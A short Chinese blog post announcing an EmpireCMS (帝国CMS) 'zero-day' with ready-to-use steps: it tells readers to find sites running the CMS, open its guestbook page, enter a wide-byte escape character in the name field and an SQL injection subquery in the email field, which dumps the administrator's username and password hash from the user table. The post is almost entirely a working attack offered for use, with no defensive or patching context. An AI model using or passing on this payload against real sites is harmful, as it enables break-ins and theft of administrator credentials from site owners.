帝国CMS网站程序0DAY:找到使用帝国CMS的站,网址后面直接加:
e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:
縗\
联系邮箱处写:
,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码
via:amxking
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载,请注明: 转自:夜火博客 [ http://www.15897.com/ ]
本文链接地址: http://www.15897.com/blog/post/EmpireCMS-0day.html
已有0位网友对本文做了一针见血的评论 【我要评论】